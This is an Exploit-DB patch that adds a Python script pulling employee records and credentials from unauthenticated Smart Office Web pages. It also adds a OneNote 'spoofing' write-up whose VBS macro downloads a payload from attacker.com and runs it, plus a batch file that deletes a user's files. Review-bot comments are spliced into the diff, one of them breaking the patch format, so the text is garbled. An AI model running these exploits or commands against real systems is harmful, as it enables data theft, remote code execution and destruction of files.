From ea194c414ff4a378ce1d1a826b6e54fa9cc4ddfe Mon Sep 17 00:00:00 2001
From: Exploit-DB
Date: Fri, 23 Jun 2023 00:16:26 +0000
Subject: [PATCH] DB: 2023-06-23
3 changes to exploits/shellcodes/ghdb
Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated)
Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing
MODX Revolution v2.8.3-pl - Authenticated Remote Code Execution
Super Socializer 7.13.52 - Reflected XSS
---
 exploits/aspx/webapps/51539.py | 63 ++++++++++++++++++++++++++++++
 exploits/multiple/remote/51538.txt | 45 +++++++++++++++++++++
 files_exploits.csv | 6 ++-
 3 files changed, 112 insertions(+), 2 deletions(-)
 create mode 100755 exploits/aspx/webapps/51539.py
 create mode 100644 exploits/multiple/remote/51538.txt
diff --git a/exploits/aspx/webapps/51539.py b/exploits/aspx/webapps/51539.py
new file mode 100755
index 000000000..b07dcbf97
--- /dev/null
+++ b/exploits/aspx/webapps/51539.py
@@ -0,0 +1,63 @@
+# Exploit Title: Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated)
+# Shodan Dork:: inurl:"https://www.shodan.io/search?query=smart+office"
+# Date: 09/Dec/2022
+# Exploit Author: Tejas Nitin Pingulkar (https://cvewalkthrough.com/)
+# Vendor Homepage: https://smartofficepayroll.com/
+# Software Link: https://smartofficepayroll.com/downloads
+# Version: Smart Office Web 20.28 and before
+# CVE Number : CVE-2022-47075 and CVE-2022-47076
+# CVSS : 7.5 (High)
+# Reference : https://cvewalkthrough.com/smart-office-suite-cve-2022-47076-cve-2022-47075/
+# Vulnerability Description:
+# Smart Office Web 20.28 and before allows Remote Information Disclosure(Unauthenticated) via insecure direct object reference (IDOR). This was fixed in latter version except for ExportEmployeeDetails.
+
+import wget
+import os
+from colorama import Fore, Style
+
+def download_file(url, filename):
+ wget.download(url, filename)
+
+# Disclaimer
+print(Fore.YELLOW + "Disclaimer: This script is for educational purposes only.")
+print("The author takes no responsibility for any unauthorized usage.")
+print("Please use this script responsibly and adhere to the legal and ethical guidelines.")
+
+agree = input("Do you agree to the disclaimer? (1 = Yes, 0 = No): ")
+if agree != "1":
+ print("You have chosen not to agree. Exiting the script.")
+ exit()
+
+# Print name in red
+name = "Exploit by Tejas Nitin Pingulkar"
+print(Fore.RED + name)
+print(Style.RESET_ALL) # Reset color
+
+website = input("Enter URL [https://1.1.1.1:1111 or http://1.1.1.1]: ")
+target_version = input("Is the target software version 20.28 or later? (1 = Yes, 0 = No): ")
+folder_name = input("Enter the folder name to save the files: ")
+
+# Create the folder if it doesn't exist
+if not os.path.exists(folder_name):
+ os.makedirs(folder_name)
+
+urls_filenames = []
+
+if target_version == "1":
+ urls_filenames.append((website + "/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeOtherDetails", "ExportEmployeeOtherDetails.csv"))
+else:
+ urls_filenames.extend([
+ (website + "/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeDetails", "ExportEmployeeDetails.csv"),
+ (website + "/DisplayParallelLogData.aspx", "DisplayParallelLogData.txt"),
+ (website + "/ExportReportingManager.aspx", "ExportReportingManager.csv"),
+ (website + "/ExportEmployeeLoginDetails.aspx", "ExportEmployeeLoginDetails.csv")
+ ])
+
+print("CVE-2022-47076: Obtain user ID and password from downloaded source")
+
+for url, filename in urls_filenames:
+ download_file(url, os.path.join(folder_name, filename))
+
+# Print "for more such interesting exploits, visit cvewalkthrough.com" in red
+print(Fore.RED + "\nFor more such interesting exploits, visit cvewalkthrough.com")
+print(Style.RESET_ALL) # Reset color
\ No newline at end of file
diff --git a/exploits/multiple/remote/51538.txt b/exploits/multiple/remote/51538.txt
new file mode 100644
index 000000000..0e7cce55b
--- /dev/null
+++ b/exploits/multiple/remote/51538.txt
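Review bot: The block under `# Create the folder if it doesn't exist` creates the output directory with default permissions, although the script's own message says the downloaded exports contain user IDs and passwords. Evidence gathered in an authorized assessment should not be readable by other local users, so I would replace the check-and-create pair with `os.makedirs(folder_name, mode=0o700, exist_ok=True)` (the mode takes effect on POSIX systems), which also closes the gap between the existence test and the creation. The header comments would serve defenders better with one added line stating that unauthenticated requests to the four listed `.aspx` pages are the thing to look for in web server logs on installs at version 20.28 and before.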
@@ -0,0 +1,45 @@
+## Title: Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing
+## Author: nu11secur1ty
+## Date: 06.22.2023
+## Vendor: https://www.microsoft.com/
+## Software: https://www.microsoft.com/en/microsoft-365/onenote/digital-note-taking-app
+## Reference: https://portswigger.net/kb/issues/00400c00_input-returned-in-response-reflected
+
+## Description:
+Microsoft OneNote is vulnerable to spoofing attacks. The malicious
+user can trick the victim into clicking on a very maliciously crafted
+URL or download some other malicious file and execute it. When this
+happens the game will be over for the victim and his computer will be
+compromised.
+Exploiting the vulnerability requires that a user open a specially
+crafted file with an affected version of Microsoft OneNote and then
+click on a specially crafted URL to be compromised by the attacker.
+
+STATUS: HIGH Vulnerability
+
+[+]Exploit:
+```vbs
+Sub AutoOpen()
+ Call Shell("cmd.exe /S /c" & "curl -s
+https://attacker.com/kurec.badass > kurec.badass && .\kurec.badass",
+vbNormalFocus)
+End Sub
+
+```
+[+]Inside-exploit
+```
+@echo off
+del /s /q C:%HOMEPATH%\IMPORTANT\*
+```
+
+## Reproduce:
+[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-33140)
+
+## Proof and Exploit:
+[href](https://www.nu11secur1ty.com/2023/06/cve-2023-33140.html)
+
+## Time spend:
+01:15:00
+
+
+--
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 5da1d43da..502e6a9f2 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -1847,6 +1847,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 41618,exploits/aspx/webapps/41618.txt,"Sitecore CMS 8.1 Update-3 - Cross-Site Scripting",2017-03-15,"Pralhad Chaskar",webapps,aspx,,2017-03-15,2017-03-15,0,CVE-2016-8855,,,,,
 45973,exploits/aspx/webapps/45973.txt,"Sitecore CMS 8.2 - Cross-Site Scripting / Arbitrary File Disclosure",2017-05-05,"Usman Saeed",webapps,aspx,,2018-12-11,2018-12-11,0,,,,,,
 45152,exploits/aspx/webapps/45152.txt,"Sitecore.Net 8.1 - Directory Traversal",2018-08-06,Chris,webapps,aspx,,2018-08-06,2018-08-09,0,CVE-2018-7669,,,,,
+51539,exploits/aspx/webapps/51539.py,"Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated)",2023-06-22,"Tejas Pingulkar",webapps,aspx,,2023-06-22,2023-06-22,0,CVE-2022-47076;CVE-2022-47075,,,,,
 42923,exploits/aspx/webapps/42923.txt,"SmarterStats 11.3.6347 - Cross-Site Scripting",2017-09-27,sqlhacker,webapps,aspx,,2017-10-01,2017-10-01,0,CVE-2017-14620,,,,,
 50328,exploits/aspx/webapps/50328.txt,"SmarterTools SmarterTrack 7922 - 'Multiple' Information Disclosure",2021-09-24,"Andrei Manole",webapps,aspx,,2021-09-24,2021-09-24,0,,,,,,
 47793,exploits/aspx/webapps/47793.txt,"Telerik UI - Remote Code Execution via Insecure Deserialization",2019-12-18,"Bishop Fox",webapps,aspx,,2019-12-18,2019-12-18,0,CVE-2019-18935,Deserialization,,,,https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui
@@ -11024,6 +11025,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 19686,exploits/multiple/remote/19686.txt,"Microsoft Internet Explorer 4/5/5.5/5.0.1 - external.NavigateAndFind() Cross-Frame",1999-12-22,"Georgi Guninski",remote,multiple,,1999-12-22,2012-07-08,1,CVE-2000-0028;OSVDB-7903,,,,,https://www.securityfocus.com/bid/887/info
 19492,exploits/multiple/remote/19492.txt,"Microsoft Internet Explorer 5 / Netscape Communicator 4.0/4.5/4.6 - JavaScript STYLE",1999-09-13,"Georgi Guninski",remote,multiple,,1999-09-13,2012-06-30,1,CVE-1999-0750,,,,,https://www.securityfocus.com/bid/630/info
 24189,exploits/multiple/remote/24189.html,"Microsoft Internet Explorer 5.0.1 / Opera 7.51 - URI Obfuscation",2004-06-10,http-equiv,remote,multiple,,2004-06-10,2013-01-17,1,,,,,,https://www.securityfocus.com/bid/10517/info
+51538,exploits/multiple/remote/51538.txt,"Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing",2023-06-22,nu11secur1ty,remote,multiple,,2023-06-22,2023-06-22,0,,,,,,
 19451,exploits/multiple/remote/19451.txt,"Microsoft Windows 98a/98b/98SE / Solaris 2.6 - IRDP",1999-08-11,L0pth,remote,multiple,,1999-08-11,2012-06-28,1,CVE-1999-0875;OSVDB-1039,,,,,https://www.securityfocus.com/bid/578/info
 51376,exploits/multiple/remote/51376.txt,"Microsoft Word 16.72.23040900 - Remote Code Execution (RCE)",2023-04-20,nu11secur1ty,remote,multiple,,2023-04-20,2023-04-20,0,CVE-2023-28311,,,,,
 20425,exploits/multiple/remote/20425.pl,"Microsys CyberPatrol 4.0 4.003/4.0 4.005 - Insecure Registration",2000-11-22,"Joey Maier",remote,multiple,,2000-11-22,2012-08-11,1,CVE-2000-1173;OSVDB-11344,,,,,https://www.securityfocus.com/bid/1977/info
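Review bot: The added row for 51538 leaves empty the field where neighbouring rows carry their CVE ids (51376 has CVE-2023-28311 there), while the write-up added in this same commit links, under Reproduce and Proof, to pages named for CVE-2023-33140. If that identifier is the one the entry covers, the row should carry it, because anyone matching this index against a vulnerability list by CVE will otherwise miss the entry. Only part of the file is visible in this hunk, so whether the field is filled in by a later pass cannot be told from here.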
@@ -23438,7 +23440,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 34788,exploits/php/webapps/34788.txt,"MODx manager - '/controllers/default/resource/tvs.php?class_key' Traversal Local File Inclusion",2010-09-29,"John Leitch",webapps,php,,2010-09-29,2014-09-26,1,CVE-2010-5278;OSVDB-68265,,,,,https://www.securityfocus.com/bid/43577/info
 45055,exploits/php/webapps/45055.py,"Modx Revolution < 2.6.4 - Remote Code Execution",2018-07-18,"Vitalii Rudnykh",webapps,php,,2018-07-18,2018-07-18,0,,,,,,
 15701,exploits/php/webapps/15701.txt,"MODx REvolution CMS 2.0.4-pl2 - POST injection Cross-Site Scripting",2010-12-06,LiquidWorm,webapps,php,,2010-12-06,2010-12-06,0,OSVDB-69643,,,,,http://bugs.modx.com/issues/2918
-51059,exploits/php/webapps/51059.txt,"MODX Revolution v2.8.3-pl - Authenticated Remote Code Execution",2023-03-25,"Sarang Tumne",webapps,php,,2023-03-25,2023-03-25,0,CVE-2022-26149,,,,,
+51059,exploits/php/webapps/51059.txt,"MODX Revolution v2.8.3-pl - Authenticated Remote Code Execution",2023-03-25,"Sarang Tumne",webapps,php,,2023-03-25,2023-06-22,1,CVE-2022-26149,,,,,
 4739,exploits/php/webapps/4739.pl,"MOG-WebShop - 'index.php?group' SQL Injection",2007-12-18,k1tk4t,webapps,php,,2007-12-17,,1,OSVDB-40272;CVE-2007-6466,,,,,
 25304,exploits/php/webapps/25304.py,"MoinMoin - Arbitrary Command Execution",2013-05-08,HTP,webapps,php,,2013-05-08,2013-06-24,1,OSVDB-93234;CVE-2012-6495;OSVDB-88825;CVE-2012-6081,,,,http://www.exploit-db.commoin-1.9.5.tar.gz,
 29915,exploits/php/webapps/29915.txt,"MoinMoin 1.5.x - 'index.php' Cross-Site Scripting",2007-04-26,"En Douli",webapps,php,,2007-04-26,2013-11-30,1,CVE-2007-2423;OSVDB-36567,,,,,https://www.securityfocus.com/bid/23676/info
@@ -30180,7 +30182,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 9270,exploits/php/webapps/9270.txt,"Super Mod System 3.0 - 's' SQL Injection",2009-07-27,MizoZ,webapps,php,,2009-07-26,,1,OSVDB-56562;CVE-2009-3224,,,,,
 9180,exploits/php/webapps/9180.txt,"Super Simple Blog Script 2.5.4 - 'entry' SQL Injection",2009-07-17,JIKO,webapps,php,,2009-07-16,,1,OSVDB-55952;CVE-2009-2553,,,,,
 9179,exploits/php/webapps/9179.txt,"Super Simple Blog Script 2.5.4 - Local File Inclusion",2009-07-17,JIKO,webapps,php,,2009-07-16,,1,OSVDB-55953;CVE-2009-2552,,,,,
-51534,exploits/php/webapps/51534.py,"Super Socializer 7.13.52 - Reflected XSS",2023-06-20,"Amirhossein Bahramizadeh",webapps,php,,2023-06-20,2023-06-20,0,CVE-2023-2779,,,,,
+51534,exploits/php/webapps/51534.py,"Super Socializer 7.13.52 - Reflected XSS",2023-06-20,"Amirhossein Bahramizadeh",webapps,php,,2023-06-20,2023-06-22,1,CVE-2023-2779,,,,,
 8874,exploits/php/webapps/8874.txt,"SuperCali PHP Event Calendar - Arbitrary Change Admin Password",2009-06-04,TiGeR-Dz,webapps,php,,2009-06-03,,1,,,,,,
 4141,exploits/php/webapps/4141.txt,"SuperCali PHP Event Calendar 0.4.0 - SQL Injection",2007-07-03,t0pP8uZz,webapps,php,,2007-07-02,2016-10-05,1,OSVDB-36300;CVE-2007-3582,,,,http://www.exploit-db.comsupercali-0.4.0.zip,
 44639,exploits/php/webapps/44639.txt,"SuperCom Online Shopping Ecommerce Cart 1 - Persistent Cross-Site scripting / Cross site request forgery / Authentication bypass",2018-05-17,L0RD,webapps,php,,2018-05-17,2018-06-15,0,,"Cross-Site Scripting (XSS)",,,,